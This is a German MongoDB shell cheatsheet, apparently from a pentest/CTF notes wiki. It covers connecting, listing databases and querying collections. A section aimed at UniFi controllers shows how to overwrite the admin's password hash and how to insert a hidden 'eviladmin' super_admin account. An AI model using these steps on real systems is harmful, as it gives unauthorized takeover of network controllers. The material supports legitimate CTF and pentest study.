MongoDB Cheatsheet

🔗 Verbindung

mongo                  # Lokaler Zugriff
mongo --port 27117     # UniFi-Standardport
mongo <host>:<port>/<db> -u <user> -p <pw> --authenticationDatabase admin

📁 Datenbankbefehle

show dbs               // Alle Datenbanken anzeigen
use <datenbank>        // In Datenbank wechseln
db                     // Zeigt aktuelle Datenbank

📦 Collection-Befehle

show collections       // Alle Collections (Tabellen) anzeigen
db.<collection>.find() // Alle Einträge in der Collection anzeigen
db.<collection>.find().pretty() // Lesbarer Output
db.<collection>.find().forEach(printjson) // Alles schön formatieren

📌 Achte darauf:

Collections heißen nicht immer users!
In UniFi z. B. heißt sie admin

🔍 Suchen & Filtern

db.<collection>.find({ "name": "admin" })
db.<collection>.find({ "role": "super_admin" })

✏️ Bearbeiten / Updaten

db.<collection>.updateOne(
  { "name": "admin" },
  { $set: { "x_shadow": "<neuer_hash>" } }
)

➕ Benutzer hinzufügen (Beispiel)

db.admin.insertOne({
  name: "eviladmin",
  email: "evil@root.htb",
  role: "super_admin",
  x_shadow: "<dein_hash>",
  time_created: Date.now() / 1000
})

💥 Tipps fürs CTF / Pentest

x_shadow ist oft SHA-512 oder bcrypt – genau prüfen!
show collections ist Pflicht, bevor du find() machst
Achte auf offene Ports: MongoDB hört manchmal auf 27017, 27117 oder localhost

Previous27017 - MongoDB Next3306 - MySQL

Last updated 8 months ago

hashtag🔗 Verbindung

hashtag📁 Datenbankbefehle

hashtag📦 Collection-Befehle

hashtag🔍 Suchen & Filtern

hashtag✏️ Bearbeiten / Updaten

hashtag➕ Benutzer hinzufügen (Beispiel)

hashtag💥 Tipps fürs CTF / Pentest

🔗 Verbindung

📁 Datenbankbefehle

📦 Collection-Befehle

🔍 Suchen & Filtern

✏️ Bearbeiten / Updaten

➕ Benutzer hinzufügen (Beispiel)

💥 Tipps fürs CTF / Pentest